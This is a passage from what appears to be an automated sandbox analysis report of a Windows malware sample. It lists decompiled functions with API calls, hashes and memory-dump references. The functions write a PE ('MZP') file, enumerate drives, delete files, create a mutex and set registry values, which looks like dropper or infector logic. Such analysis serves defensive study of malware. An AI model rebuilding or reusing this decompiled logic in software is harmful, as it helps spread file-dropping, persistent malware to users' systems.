                                                                                                                          • Opcode ID: 07c637d247b66d3b0a9c7b3941f0c52b1614d40a6673a640bb3ecb2c78beae31
                                                                                                                          • Instruction ID: 3ae4d4c2ce5489376b9a0e409b07906e0c93d400668ceedc4e43a286d92feaa2
                                                                                                                          • Opcode Fuzzy Hash: 07c637d247b66d3b0a9c7b3941f0c52b1614d40a6673a640bb3ecb2c78beae31
                                                                                                                          • Instruction Fuzzy Hash: DEC04CA12582083AF51061A29C16F23355CC781799F12456AB704E51D1F096F81000A9
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00404BE0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00404BE0(void* __eax, long __ecx, void* __edx) {
				int _t2;
				void* _t3;
				void* _t7;
				DWORD* _t9;

				_t2 = WriteFile(__eax, __edx, __ecx, _t9, 0); // executed
				_t3 = _t7;
				if(_t2 == 0) {
					return 0;
				}
				return _t3;
			}







                                                                                                                          0x00404bea
                                                                                                                          0x00404bf1
                                                                                                                          0x00404bf2
                                                                                                                          0x00000000
                                                                                                                          0x00404bf4
                                                                                                                          0x00404bf7

                                                                                                                          APIs
                                                                                                                          • WriteFile.KERNEL32(00000000,MZP,0000A200,?,00000000,?,?,0040742B), ref: 00404BEA
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FileWrite
                                                                                                                          • String ID: MZP
                                                                                                                          • API String ID: 3934441357-2889622443
                                                                                                                          • Opcode ID: 83a29245ac6b35b996f4ce35e430c7ef2da10dd3d2364903d861bf1a917f60bf
                                                                                                                          • Instruction ID: cd8d274a544879f86d75f83ceab2a9824fbef203ff2d66308718860d554d7d3d
                                                                                                                          • Opcode Fuzzy Hash: 83a29245ac6b35b996f4ce35e430c7ef2da10dd3d2364903d861bf1a917f60bf
                                                                                                                          • Instruction Fuzzy Hash: 4EC04CA11582083AF51051A7AC06F233A5CC781698F114436BB08E1581F456F8011079
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00401E74, Relevance: 3.1, APIs: 2, Instructions: 124COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00401788: RtlInitializeCriticalSection.KERNEL32(0040A5B4,00000000,0040183E,?,?,00402022,0040A5F4,00000000,00000000,?,?,00401A11,00401A26,00401B77), ref: 0040179E
                                                                                                                            • Part of subcall function 00401788: RtlEnterCriticalSection.KERNEL32(0040A5B4,0040A5B4,00000000,0040183E,?,?,00402022,0040A5F4,00000000,00000000,?,?,00401A11,00401A26,00401B77), ref: 004017B1
                                                                                                                            • Part of subcall function 00401788: LocalAlloc.KERNEL32(00000000,00000FF8,0040A5B4,00000000,0040183E,?,?,00402022,0040A5F4,00000000,00000000,?,?,00401A11,00401A26,00401B77), ref: 004017DB
                                                                                                                            • Part of subcall function 00401788: RtlLeaveCriticalSection.KERNEL32(0040A5B4,00401845,00000000,0040183E,?,?,00402022,0040A5F4,00000000,00000000,?,?,00401A11,00401A26,00401B77), ref: 00401838
                                                                                                                          • RtlEnterCriticalSection.KERNEL32(0040A5B4,00000000,00401FF0), ref: 00401EBF
                                                                                                                          • RtlLeaveCriticalSection.KERNEL32(0040A5B4,00401FF7), ref: 00401FEA
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2227675388-0
                                                                                                                          • Opcode ID: 24205a5bcb3744ab7aeb7e662ffdb7704d8f0e00ee709498c29b313c1ff4e1e9
                                                                                                                          • Instruction ID: c8d1828e50afdd1ef66478082c2fc5af823077db28515af4f228c2db3bc24797
                                                                                                                          • Opcode Fuzzy Hash: 24205a5bcb3744ab7aeb7e662ffdb7704d8f0e00ee709498c29b313c1ff4e1e9
                                                                                                                          • Instruction Fuzzy Hash: 8A419BB2A043029FD714CF69DE81A2AB7B0FB59318B18827FD441E72F1D739A8518A49
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0040759C, Relevance: 3.1, APIs: 2, Instructions: 62synchronizationCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 61%
                                                                                                                          			E0040759C(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				char _v8;
				char _v12;
				void* _t11;
				void* _t17;
				void* _t32;
				intOrPtr _t38;
				void* _t44;
				void* _t46;
				intOrPtr _t49;

				_t56 = __fp0;
				_t45 = __esi;
				_t48 = _t49;
				_push(0);
				_push(0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_push(_t49);
				_push(0x40765c);
				_push( *[fs:eax]);
				 *[fs:eax] = _t49; // executed
				_t11 = E00406E94(__ebx, __ecx, __edi, __esi, __eflags, __fp0); // executed
				if(_t11 != 0) {
					_t40 = 0x14;
					E00407080(0x4091c8, 0x14, 0x14);
					_t17 = E00404018(0, 0, 0x4091c8); // executed
					_t44 = _t17;
					if(GetLastError() != 0xb7) {
						E00406D40( &_v8, __ebx, _t44, __esi); // executed
						_t32 = E0040320C(_v8);
						_t53 = _t32;
						if(_t32 > 0) {
							_t46 = 1;
							do {
								E004031B4();
								_t40 = 0x407674;
								E00403214( &_v12, 0x407674);
								E004074B4(_v12, _t32, _t44, _t46, _t53, _t48); // executed
								_pop(0x14);
								_t46 = _t46 + 1;
								_t32 = _t32 - 1;
								_t54 = _t32;
							} while (_t32 != 0);
						}
						E00406E0C(_t32, 0x14, _t40, _t44, _t45, _t54, _t56);
						ReleaseMutex(_t44);
					}
				}
				_pop(_t38);
				 *[fs:eax] = _t38;
				_push(E00407663);
				return E004030B8( &_v12, 2);
			}












                                                                                                                          0x0040759c
                                                                                                                          0x0040759c
                                                                                                                          0x0040759d
                                                                                                                          0x0040759f
                                                                                                                          0x004075a1
                                                                                                                          0x004075a3
                                                                                                                          0x004075a4
                                                                                                                          0x004075a5
                                                                                                                          0x004075a8
                                                                                                                          0x004075a9
                                                                                                                          0x004075ae
                                                                                                                          0x004075b1
                                                                                                                          0x004075b4
                                                                                                                          0x004075bb
                                                                                                                          0x004075cb
                                                                                                                          0x004075d0
                                                                                                                          0x004075de
                                                                                                                          0x004075e3
                                                                                                                          0x004075ef
                                                                                                                          0x004075f4
                                                                                                                          0x00407601
                                                                                                                          0x00407603
                                                                                                                          0x00407605
                                                                                                                          0x00407607
                                                                                                                          0x0040760c
                                                                                                                          0x00407617
                                                                                                                          0x0040761f
                                                                                                                          0x00407624
                                                                                                                          0x0040762c
                                                                                                                          0x00407631
                                                                                                                          0x00407632
                                                                                                                          0x00407633
                                                                                                                          0x00407633
                                                                                                                          0x00407633
                                                                                                                          0x0040760c
                                                                                                                          0x00407636
                                                                                                                          0x0040763c
                                                                                                                          0x0040763c
                                                                                                                          0x004075ef
                                                                                                                          0x00407643
                                                                                                                          0x00407646
                                                                                                                          0x00407649
                                                                                                                          0x0040765b

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00404018: CreateMutexA.KERNEL32(00408220,00408206,00408205,?,004075E3,00000000,00000000,004091C8,00000000,0040765C,?,?,?,?,00000000,00000000), ref: 0040402E
                                                                                                                          • GetLastError.KERNEL32(00000000,00000000,004091C8,00000000,0040765C,?,?,?,?,00000000,00000000,?,00408205,00000000,00408220), ref: 004075E5
                                                                                                                            • Part of subcall function 00406D40: GetLogicalDriveStringsA.KERNEL32 ref: 00406D70
                                                                                                                          • ReleaseMutex.KERNEL32(00000000,00000000,00000000,004091C8,00000000,0040765C,?,?,?,?,00000000,00000000,?,00408205,00000000,00408220), ref: 0040763C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Mutex$CreateDriveErrorLastLogicalReleaseStrings
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 676290295-0
                                                                                                                          • Opcode ID: 0b1858c04844e63bceb42a1c2aae0906aae676d4158ef1d644554abea356ae6a
                                                                                                                          • Instruction ID: a50fa674edadcb4b051b0a96f5935ee5b8f91fbc0aee7086ed6abe5ddad9c237
                                                                                                                          • Opcode Fuzzy Hash: 0b1858c04844e63bceb42a1c2aae0906aae676d4158ef1d644554abea356ae6a
                                                                                                                          • Instruction Fuzzy Hash: A2110A306446086BD710BBA6CC42B5E7B6CCB81714F5004BBFA017B3C3CA3DAD04816E
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 004012A0, Relevance: 2.5, APIs: 2, Instructions: 37memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E004012A0(void* __eax, void** __edx) {
				void* _t3;
				void** _t8;
				void* _t11;
				long _t14;

				_t8 = __edx;
				if(__eax >= 0x100000) {
					_t14 = __eax + 0x0000ffff & 0xffff0000;
				} else {
					_t14 = 0x100000;
				}
				_t8[1] = _t14;
				_t3 = VirtualAlloc(0, _t14, 0x2000, 1); // executed
				_t11 = _t3;
				 *_t8 = _t11;
				if(_t11 != 0) {
					_t3 = E00401154(0x40a5d4, _t8);
					if(_t3 == 0) {
						VirtualFree( *_t8, 0, 0x8000);
						 *_t8 = 0;
						return 0;
					}
				}
				return _t3;
			}







                                                                                                                          0x004012a3
                                                                                                                          0x004012ad
                                                                                                                          0x004012bc
                                                                                                                          0x004012af
                                                                                                                          0x004012af
                                                                                                                          0x004012af
                                                                                                                          0x004012c2
                                                                                                                          0x004012cf
                                                                                                                          0x004012d4
                                                                                                                          0x004012d6
                                                                                                                          0x004012da
                                                                                                                          0x004012e3
                                                                                                                          0x004012ea
                                                                                                                          0x004012f6
                                                                                                                          0x004012fd
                                                                                                                          0x00000000
                                                                                                                          0x004012fd
                                                                                                                          0x004012ea
                                                                                                                          0x00401302

                                                                                                                          APIs
                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004015A9), ref: 004012CF
                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004015A9), ref: 004012F6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Virtual$AllocFree
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2087232378-0
                                                                                                                          • Opcode ID: 677c0526faf000c49acf14ba7c711909bb3502ece2a084bb3d0e397bba4ce0ca
                                                                                                                          • Instruction ID: 90e8f67b1060bd1251f945ff82b9078c1ba764c12e4cd0c6011b14969f372c3f
                                                                                                                          • Opcode Fuzzy Hash: 677c0526faf000c49acf14ba7c711909bb3502ece2a084bb3d0e397bba4ce0ca
                                                                                                                          • Instruction Fuzzy Hash: 97F02773B006205BEB206A6A4D81B4369C59F59B90F1400BAFB4CFF3D9DA798C0043A9
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00405200, Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 45%
                                                                                                                          			E00405200(void* __eax, void* __ebx, void* __esi, void* __eflags) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				void* _t22;
				void* _t30;
				void* _t31;
				void* _t39;
				intOrPtr _t41;
				intOrPtr _t46;

				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t30 = __eax;
				_push(_t46);
				_push(0x405291);
				_push( *[fs:eax]);
				 *[fs:eax] = _t46;
				E00404ED0(__eax,  &_v16);
				_push(_v16);
				E00404EEC( &_v20);
				_pop(_t39); // executed
				E00405080(_v20, _t30,  &_v8, _t39, __esi); // executed
				_t31 = 1;
				while(_v8 != 0) {
					E00404798( &_v8,  &_v12, E004052A8);
					if(_t31 == 0 || DeleteFileA(E0040340C(_v12)) == 0) {
						_t22 = 0;
					} else {
						_t22 = 1;
					}
					_t31 = _t22;
				}
				_pop(_t41);
				 *[fs:eax] = _t41;
				_push(E00405298);
				return E004030B8( &_v20, 4);
			}













                                                                                                                          0x00405205
                                                                                                                          0x00405206
                                                                                                                          0x00405207
                                                                                                                          0x00405208
                                                                                                                          0x0040520a
                                                                                                                          0x0040520e
                                                                                                                          0x0040520f
                                                                                                                          0x00405214
                                                                                                                          0x00405217
                                                                                                                          0x0040521f
                                                                                                                          0x00405227
                                                                                                                          0x0040522d
                                                                                                                          0x00405238
                                                                                                                          0x00405239
                                                                                                                          0x0040523e
                                                                                                                          0x00405270
                                                                                                                          0x0040524d
                                                                                                                          0x00405254
                                                                                                                          0x00405268
                                                                                                                          0x0040526c
                                                                                                                          0x0040526c
                                                                                                                          0x0040526c
                                                                                                                          0x0040526e
                                                                                                                          0x0040526e
                                                                                                                          0x00405278
                                                                                                                          0x0040527b
                                                                                                                          0x0040527e
                                                                                                                          0x00405290

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00405080: FindFirstFileA.KERNEL32(00000000,?,00000000,004051DB,?,?,?,?,0040523E,00000000,00405291,?,?,00000000,00000000,00000000), ref: 0040513B
                                                                                                                            • Part of subcall function 00405080: FindClose.KERNEL32(00000000,00000000,00000010), ref: 004051AB
                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00405291,?,?,00000000,00000000,00000000,00000000,?,00407736,?,?,?,00000000,0040798C), ref: 0040525F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FileFind$CloseDeleteFirst
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3969940835-0
                                                                                                                          • Opcode ID: 238fab5c7ccdf0ad421be398039805a42527f4fe23ed0a78c41523e31c8e5186
                                                                                                                          • Instruction ID: 7b79426e1ef5d484ccb35ed710867a40efa654d54104ddfac4c0367765dd07f6
                                                                                                                          • Opcode Fuzzy Hash: 238fab5c7ccdf0ad421be398039805a42527f4fe23ed0a78c41523e31c8e5186
                                                                                                                          • Instruction Fuzzy Hash: BF01A174604608AFDB04EBA1CC529AF73ACEF45304F5048BEF901B3281E678AE059E68
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0040578C, Relevance: 1.5, APIs: 1, Instructions: 31registryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E0040578C(void* __eax, void* __ecx, void* __edx) {
				void* _t4;
				char* _t7;
				long _t10;
				void* _t12;

				_t12 = __eax;
				if(__eax == 0) {
					L2:
					return 0;
				}
				_t4 = E0040320C(__ecx);
				_t7 = E0040340C(__ecx);
				_t10 = RegSetValueExA(_t12, E0040340C(__edx), 0, 1, _t7, _t4 + 1); // executed
				if(_t10 == 0) {
					return 1;
				}
				goto L2;
			}







                                                                                                                          0x00405793
                                                                                                                          0x00405797
                                                                                                                          0x004057c0
                                                                                                                          0x00000000
                                                                                                                          0x004057c0
                                                                                                                          0x0040579b
                                                                                                                          0x004057a4
                                                                                                                          0x004057b7
                                                                                                                          0x004057be
                                                                                                                          0x00000000
                                                                                                                          0x004057c4
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • RegSetValueExA.ADVAPI32(00000000,00000000,00000000,00000001,00000000,00000001,?,?,00000000,00407AA2,00000000,00407AC4,?,?,00000000,00000000), ref: 004057B7
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Value
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3702945584-0
                                                                                                                          • Opcode ID: 8fc1d0df2935156870a761a9e005f3ed3dcf16a2c3928d3d316ee70feded526d
                                                                                                                          • Instruction ID: 82ccab74ab13a132c34841d8e2f7e51fc97cb509c9d1c97b6ea97491bda523d5
                                                                                                                          • Opcode Fuzzy Hash: 8fc1d0df2935156870a761a9e005f3ed3dcf16a2c3928d3d316ee70feded526d
                                                                                                                          • Instruction Fuzzy Hash: 17E04F5131061166E511256A0CC1A7B0D9D8B44A56F04043BB904EF2C3D968CD0321A9
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00406CA8, Relevance: 1.5, APIs: 1, Instructions: 24windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00406CA8(void* __eax, int __ecx, void* __edx) {
				char* _t6;
				void* _t7;
				void* _t8;
				void* _t11;
				int _t16;

				_t16 = __ecx;
				_t11 = __eax;
				E004064E4(__eax);
				_t6 = E0040340C(__edx);
				_t7 =  *0x40a650; // 0x400000
				_t8 = ExtractIconA(_t7, _t6, _t16); // executed
				if(_t8 > 1) {
					return E00406520(_t11, _t8);
				}
				return _t8;
			}








                                                                                                                          0x00406cab
                                                                                                                          0x00406caf
                                                                                                                          0x00406cb3
                                                                                                                          0x00406cbb
                                                                                                                          0x00406cc1
                                                                                                                          0x00406cc7
                                                                                                                          0x00406ccf
                                                                                                                          0x00000000
                                                                                                                          0x00406cd4
                                                                                                                          0x00406cdc

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 004064E4: DestroyCursor.USER32(00000000), ref: 004064F3
                                                                                                                          • ExtractIconA.SHELL32(00400000,00000000,00000000), ref: 00406CC7
                                                                                                                            • Part of subcall function 00406520: GetIconInfo.USER32(?), ref: 00406540
                                                                                                                            • Part of subcall function 00406520: GetObjectA.GDI32(?,00000018,?), ref: 00406551
                                                                                                                            • Part of subcall function 00406520: DeleteObject.GDI32(?), ref: 00406566
                                                                                                                            • Part of subcall function 00406520: DeleteObject.GDI32(?), ref: 00406574
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Object$DeleteIcon$CursorDestroyExtractInfo
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2619871307-0
                                                                                                                          • Opcode ID: 12884ea93cf9522b21f7407772e5477059801f61b384028fea43c793ebaab2fd
                                                                                                                          • Instruction ID: 3dd68c7f1dd4f5608f9b9662a0ba171f3b5b53225b24c93893625578eb0e5390
                                                                                                                          • Opcode Fuzzy Hash: 12884ea93cf9522b21f7407772e5477059801f61b384028fea43c793ebaab2fd
                                                                                                                          • Instruction Fuzzy Hash: 32D05E767002202BC321B6BF2CC181B8ADDCACA269316453FB109F7293C97DCC12126D
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0040575C, Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E0040575C(void* __eax, void* __ecx, void* __edx) {
				long _t4;
				void* _t7;
				void** _t12;

				_t7 = __eax;
				_t4 = RegOpenKeyExA(_t7, E0040340C(__edx), 0, 0x2001f, _t12); // executed
				if(_t4 != 0) {
					 *_t12 = 0;
				}
				return  *_t12;
			}






                                                                                                                          0x00405761
                                                                                                                          0x00405774
                                                                                                                          0x0040577b
                                                                                                                          0x0040577f
                                                                                                                          0x0040577f
                                                                                                                          0x00405788

                                                                                                                          APIs
                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000000,00000000,00000000,0002001F,?,?,?,?,00407A60,00000000,00407AC4,?,?,00000000,00000000,00000000), ref: 00405774
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Open
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 71445658-0
                                                                                                                          • Opcode ID: 069e22fb027c4afddc5b5976f6d816458c7a75ea1a42f49c021bc25e4846d371
                                                                                                                          • Instruction ID: 3a3203429d587fd7172cf24d4e67cc15a32e0ac6e1cd073cd859d0159acdf75a
                                                                                                                          • Opcode Fuzzy Hash: 069e22fb027c4afddc5b5976f6d816458c7a75ea1a42f49c021bc25e4846d371
                                                                                                                          • Instruction Fuzzy Hash: 7AD05EA13046107EE210B62A5C81FBB6ACCCB487A6F00053AF948E6283D225CD0052A5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00404F34, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00404F34(void* __eax, void* __edx) {
				char _v268;
				long _t6;
				void* _t13;
				void* _t14;

				_t13 = __edx;
				_t6 = GetShortPathNameA(E0040340C(__eax),  &_v268, 0x104); // executed
				return E00403184(_t13, _t6, _t14);
			}







                                                                                                                          0x00404f3c
                                                                                                                          0x00404f52
                                                                                                                          0x00404f6a

                                                                                                                          APIs
                                                                                                                          • GetShortPathNameA.KERNEL32 ref: 00404F52
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: NamePathShort
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1295925010-0
                                                                                                                          • Opcode ID: abb4d550bda5475c99f0f2794432747b4105fc54e92a365e7278d0c8b630ade4
                                                                                                                          • Instruction ID: 14e814bc68ad69d6c3dbd45ca29a6777f0e45ac5a2bbd03733d3eefc14da3dab
                                                                                                                          • Opcode Fuzzy Hash: abb4d550bda5475c99f0f2794432747b4105fc54e92a365e7278d0c8b630ade4
                                                                                                                          • Instruction Fuzzy Hash: C9D05EE1B0021027D200B66D1CC2A9BA6CC4B88729F14413A7758EB2D2E9798E1402D9
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00404B68, Relevance: 1.5, APIs: 1, Instructions: 18fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 66%
                                                                                                                          			E00404B68(CHAR* __eax, unsigned int __edx) {
				CHAR* _t1;
				void* _t2;
				long _t6;
				long _t9;

				_t9 = __edx;
				_t1 = __eax;
				_push(0);
				_t6 = __edx >> 0x00000010 & 0x00001fff;
				if(_t6 == 0) {
					_t6 = 0x80;
				}
				_t2 = CreateFileA(_t1, 0, _t9, 0, _t9, _t6, ??); // executed
				return _t2;
			}







                                                                                                                          0x00404b68
                                                                                                                          0x00404b68
                                                                                                                          0x00404b6a
                                                                                                                          0x00404b70
                                                                                                                          0x00404b75
                                                                                                                          0x00404b77
                                                                                                                          0x00404b77
                                                                                                                          0x00404b88
                                                                                                                          0x00404b8d

                                                                                                                          APIs
                                                                                                                          • CreateFileA.KERNEL32(00408220,80000301,80000301,00000000,80000301,80000301,00000000,00404CB4,00000000,00404CE6), ref: 00404B88
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateFile
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 823142352-0
                                                                                                                          • Opcode ID: eea2c6d1fddd31fd331317c09d3e296815bd40418f117fca415fb9ec57fe0382
                                                                                                                          • Instruction ID: ecc9e2cd6cddaadd7fb33e9927afed1fcbe410aa9616ae81c498ff4a473f225f
                                                                                                                          • Opcode Fuzzy Hash: eea2c6d1fddd31fd331317c09d3e296815bd40418f117fca415fb9ec57fe0382
                                                                                                                          • Instruction Fuzzy Hash: F9C012E15641113EFA0C22587C37FBB128D83D4714C90962EB206A77D1C458280041AC
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00404018, Relevance: 1.5, APIs: 1, Instructions: 14synchronizationCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 68%
                                                                                                                          			E00404018(struct _SECURITY_ATTRIBUTES* _a4, void* _a8, CHAR* _a12) {
				void* _t8;

				_t4 = _a12;
				asm("sbb eax, eax");
				_t8 = CreateMutexA(_a4,  &(_a12[1]) & 0x0000007f, _t4); // executed
				return _t8;
			}




                                                                                                                          0x0040401b
                                                                                                                          0x00404023
                                                                                                                          0x0040402e
                                                                                                                          0x00404034

                                                                                                                          APIs
                                                                                                                          • CreateMutexA.KERNEL32(00408220,00408206,00408205,?,004075E3,00000000,00000000,004091C8,00000000,0040765C,?,?,?,?,00000000,00000000), ref: 0040402E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateMutex
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1964310414-0
                                                                                                                          • Opcode ID: 21e0619b74412fae9514185c35c6bd95fbb7b52f213a822672066e7264c0ded7
                                                                                                                          • Instruction ID: 31d529539147b31f913da60fb79b32c9d72b995d2910e43382fd7a33128a04fb
                                                                                                                          • Opcode Fuzzy Hash: 21e0619b74412fae9514185c35c6bd95fbb7b52f213a822672066e7264c0ded7
                                                                                                                          • Instruction Fuzzy Hash: 8AC01273150248ABC700EEA9DC05D9B33DC5758609B008825B618D7100C139E5909B64
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00404EB0, Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 58%
                                                                                                                          			E00404EB0(void* __eax) {
